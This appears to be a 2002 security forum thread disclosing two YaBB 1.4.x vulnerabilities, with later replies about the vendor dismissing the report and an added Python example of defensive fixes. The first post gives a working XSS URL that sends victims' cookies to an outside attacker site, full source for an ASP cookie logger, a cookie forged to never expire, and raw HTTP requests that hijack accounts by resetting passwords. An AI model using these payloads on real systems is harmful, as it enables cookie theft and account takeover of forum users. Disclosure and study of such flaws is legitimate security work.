-
October 19th, 2002, 12:00 PM
#1
The New YaBB Vulnerability!!!!
OK Antionline, as I said earlier about finding security issues, my friend and I found 2 security issues in YaBB Forums, and here they are (this text we wrote is really fresh on the net) (P.S. voting will help me, thanks):
Two security vulnerabilities in YaBB allow stealing users' cookies and hijacking users' accounts.
Tested on:
YaBB 1.4.0 & 1.4.1
Summary :
YaBB is a leading provider of free, downloadable php forums for webmasters. Two security vulnerabilities in the product allow a remote attacker to steal users' cookies, hijack users' accounts, and more. The issues discussed are:
1. Cross Site Scripting Vulnerability on the login procedure.
2. Unsecured changing profile method.
*************** 1. Cross Site Scripting Vulnerability on the login procedure ******************
If we log into YaBB forums and enter invalid username/password, the forum displays the username and the password we entered, and it doesn't strip HTML tags from the password field, allowing us to write malicious HTML and JavaScript into the page. From now on, stealing the username cookie is pretty easy. The method for this is creating a css vulnerability in the target site, forcing him to send the cookie to an .asp file we have created. This can be done by this statement :
http://target.com/forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>window.location.href(%22http://www.oursite.com/hack.asp?%22%2Bdocument.cookie)</script>
Sending the above URL to someone can look suspicious to him, but we can build a site which has an invisible frame to that URL, which is a lot more dangerous.
NOTE: YaBB doesn't allow us to use "=" or "%3d", so we have to catch the cookie without a Request("data") statement in the ASP file, because then we would need to put "data=" in the URL.
OK, now let's build the hack.asp file, to log the cookie we are posting. The file should look like this:
------------------------------- hack.asp ------------------------------------
<%
Option Explicit
Const ForWriting = 2
Const ForAppending = 8
Const Create = True
Dim MyFile
Dim FSO ' FileSystemObject
Dim TSO ' TextStreamObject
Dim Str
Str = Request.ServerVariables("QUERY_STRING")
MyFile = Server.MapPath("./db/log.txt")
Set FSO = Server.CreateObject("Scripting.FileSystemObject")
Set TSO = FSO.OpenTextFile(MyFile, ForAppending, Create)
if (Str <> "") then TSO.WriteLine Str
TSO.close
Set TSO = Nothing
Set FSO = Nothing
%>
<HTML>
<BODY>
You have just been hacked.
</BODY>
</HTML>
----------------------------------- EOF -----------------------------------
This file writes Request.ServerVariables("QUERY_STRING"), which is the whole path we are posting after the "?", into a log file.
************* 2. Unsecured changing profile method ***************
YaBB has a form to change users' details. The original password is not required when changing the password to a new one, meaning that if an attacker has someone else's cookie, he can change that user's password.
- Defines:
USERNAME - The username
USERNAME COOKIE - The username cookie.
- YaBB Cookie Explanation :
The format of the YaBB cookie is something like:
Cookie: YaBBusername=<USERNAME>; YaBBpassword=ys6bPWmp44PXA;
expiretime=1034304354
After the attacker has got the cookie, he can use it to change the user's password. He can use the cookie even if the expiretime has passed, by changing the cookie to the following:
Cookie: YaBBusername=<USERNAME>; YaBBpassword=ys6bPWmp44PXA;
expiretime=9999999999
This one will always work.
- Exploiting the server and changing to a new password:
First of all, if the attacker only wants to change the password and not the user details, he will have to get them from the server database, and only then can he build the POST request that will change the user's password. To do that, he also has to include the stolen cookie.
To find out the user details, he will send this request to the server:
------------------------------------
GET /forums/index.php?board=;action=profile;user=<USERNAME> HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-powerpoint, application/vnd.ms-excel,
application/msword,
*/*
Accept-Language: en-us
Cookie: <USERNAME COOKIE>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.victim.com
Proxy-Connection: Keep-Alive
------------------------------------
Then the server will return a form with the <USERNAME> details, and allow the attacker to change them. Note that the form doesn't ask the user to enter his previous password, and it doesn't check anything but the username and his cookie to see if it is the legitimate user. Now the attacker is ready to build his main POST request to change the user's password.
The POST request might look like this:
------------------------------------
POST /forums/index.php?board=;action=profile2 HTTP/1.1
Accept: application/vnd.ms-powerpoint, application/vnd.ms-excel,
application/msword, image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;
TUCOWS;
YComp 5.0.0.0)
Host: www.victim.com
Content-Length: 286
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: <USERNAME COOKIE>
userID=666&user=<USERNAME>&passwrd1=HaCkEd&passwrd2=HaCkEd&name=<USERNAME>&e
[email protected]&gender=&bday1=00&bday2=00&bday3=0000&location=&websi
tetitle=&websiteurl=&icq=3&aim=&msn=&yim=&usertext=&hideemail=on&usertimefor
mat=&usertimeoffset=0&signature=&secretQuestion=&secretAnswer=&moda=1
------------------------------------
All the details that the attacker set are values taken from the form he got when he sent the GET request first (note that userID is a hidden value).
You can see the "passwrd1" and "passwrd2" parameters that the attacker sends to the server.
After sending the above POST request, the user's password will be changed to "HaCkEd".
*************************************************************************
- Possible Solution:
For the CSS problem: don't show the invalid username/password, or at least strip HTML tags from the password field.
For the password changing problem:
1. YaBB can save the IP of each user, and check the IP when someone asks to change his password. (Still not unbreakable, but much harder to exploit).
2. YaBB can ask the user to also enter the previous password before changing it to a new one. That way the attacker won't be able to break the forum protection by having only the user's cookie.
-
The security vulnerabilities were found by:
Assaf Reshef
Email: [email protected]
Nir Adar
Email: [email protected]
Web: http://underwar.livedns.co.il
*************************************************************************
Vendor status:
10.10 First contact with the vendor, about the first security issue.
11.10-16.10 Talking with the vendor. Vendor didn't take this seriously.
18.10 Second contact about the second security issue.
18.10 Vendor didn't take this issue seriously either.
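As an added example (not part of the original post, and not YaBB's own code), here is how the two fixes proposed under "Possible Solution" look in Python: the failed-login message is HTML-escaped and no longer echoes the password at all, and the password-change handler re-checks the current password before accepting a new one. It also goes one step beyond the post: since the post shows that the cookie's expiretime can simply be rewritten by the client, the session cookie here carries an HMAC, so a tampered expiry is rejected server-side. The Forum class, its user store and the cookie layout are constructed for this example and are assumptions, not YaBB's design.

```python
"""Defensive counterparts to the two YaBB issues in the post (added example,
not YaBB code). Standard library only; Forum, its user store and the cookie
layout are constructed for the example."""
import hashlib
import hmac
import html
import os
import time
from typing import Optional


# Issue 1: the failed-login page echoed username and password unescaped.
def render_login_error_unsafe(user: str, passwd: str) -> str:
    # Vulnerable pattern for comparison: raw interpolation lets "<script>" through.
    return f"<p>Login failed for {user} / {passwd}</p>"


def render_login_error_safe(user: str) -> str:
    # Fix: never echo the password, and HTML-escape anything that is echoed.
    return f"<p>Login failed for {html.escape(user, quote=True)}</p>"


# Issue 2: profile change trusted the cookie alone, and the cookie's
# expiretime field was under the client's control.
class Forum:
    def __init__(self, server_key: bytes):
        self._key = server_key  # stays server-side, never sent to clients
        self._users: dict = {}  # username -> (salt, pbkdf2 hash)

    @staticmethod
    def _hash(pw: str, salt: bytes) -> bytes:
        return hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, 100_000)

    def register(self, user: str, pw: str) -> None:
        salt = os.urandom(16)
        self._users[user] = (salt, self._hash(pw, salt))

    def check_password(self, user: str, pw: str) -> bool:
        rec = self._users.get(user)
        if rec is None:
            return False
        salt, stored = rec
        return hmac.compare_digest(stored, self._hash(pw, salt))

    # Session cookie: "user|expiry|mac". Unlike the YaBB cookie shown in the
    # post, editing the expiry on the client breaks the MAC and the cookie
    # is rejected.
    def issue_cookie(self, user: str, lifetime_s: int) -> str:
        exp = str(int(time.time()) + lifetime_s)
        payload = f"{user}|{exp}"
        mac = hmac.new(self._key, payload.encode(), "sha256").hexdigest()
        return f"{payload}|{mac}"

    def user_from_cookie(self, cookie: str, now: Optional[float] = None) -> Optional[str]:
        try:
            user, exp, mac = cookie.split("|")
        except ValueError:
            return None
        expected = hmac.new(self._key, f"{user}|{exp}".encode(), "sha256").hexdigest()
        if not hmac.compare_digest(mac, expected):
            return None  # tampered user or expiry
        if int(exp) < (now if now is not None else time.time()):
            return None  # expired, enforced by the server, not the client
        return user

    def change_password(self, cookie: str, old_pw: str, new1: str, new2: str) -> bool:
        user = self.user_from_cookie(cookie)
        if user is None:
            return False
        # The fix the post proposes: a valid session is not enough, the
        # caller must re-prove the current password.
        if not self.check_password(user, old_pw):
            return False
        if not new1 or new1 != new2:
            return False
        self.register(user, new1)  # re-salt and store the new hash
        return True
```

With this layout a stolen cookie alone cannot rotate the password, and an attacker who rewrites expiretime to 9999999999, as the post describes, gets a MAC mismatch instead of an indefinitely valid session.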
-
October 19th, 2002, 03:12 PM
#2
Excellent thread STeRoiD, good finding.
-
October 19th, 2002, 07:44 PM
#3
Nice find. Just wondering about a couple of things.
1. Why did you use asp? Something special? Or just a language you know?
2. What did YaBB say to you exactly? Did they just refuse to acknowledge the problem or what? Seems like a big problem, anybody with win9x or xp pro, 2k, and nt could run asp pages. I dunno about xp home.
3. Do you guys have a background in security or something? Or were you just very bored? I've been studying php portals, and found a few problems, but nothing as complicated as this.
-
October 19th, 2002, 10:45 PM
#4
Answers
Answers:
> 1. Why did you use asp? Something special? Or just a language you know?
Just language we know...
>2. What did YaBB say to you exactly? Did they just refuse to acknowledge the problem or
> what? Seems like a big problem, anybody with win9x or xp pro, 2k, and nt could run asp
> pages. I dunno about xp home.
Examples of some of YaBB's replies:
------------------------------------------------------------------------------------------
Well we're looking into it but we're not so sure what we're going to do
with it. Basically this issue equates to: If someone steals my key for my
house, it means there is a security hole. And really that ISN'T a security
hole.
------------------------------------------------------------------------------------------
If you guys can grab control of my user account on the main forums,
I'll take this seriously. Take control of my account (username is *****) and
post a message in the admin area, I will take a hard look at these...
The developers weren't at all convinced that the first thing was a
security hole and I'm not so sure this next one is either.
------------------------------------------------------------------------------------------
> 3. Do you guys have a background in security or something? Or were you just very bored?
> I've been studying php portals, and found a few problems, but nothing as complicated as
> this.
We are programmers. Finding the bugs was easy - anyone can see that they don't ask for the previous password before changing it to a new one. Also, it is easy to find the CSS bug.
Simply type something like "whatever" in every text input you find, and test whether it strips the tag or not.
Exploiting the bugs - it is programming.
Nir
-
October 19th, 2002, 10:55 PM
#5
If you guys can grab control of my user account on the main forums,
I'll take this seriously. Take control of my account (username is *****) and
post a message in the admin area, I will take a hard look at these...
That's foolish, lots of people can be socially engineered. To ignore the situation, well, it shows they aren't all that committed to the security of their product. They shouldn't hope that every user who uses YaBB knows better. Ignoring a flaw only proves that YaBB isn't the way to go if you're looking for a forum.
Anyways, thanks for the post.
-
October 19th, 2002, 11:06 PM
#6
Good thread STeRoiD. One of my friends uses YaBB on his site. He will be mad to have to change one of its components again (last month it was the web server that was cracked).
Life is boring. Play NetHack... --more--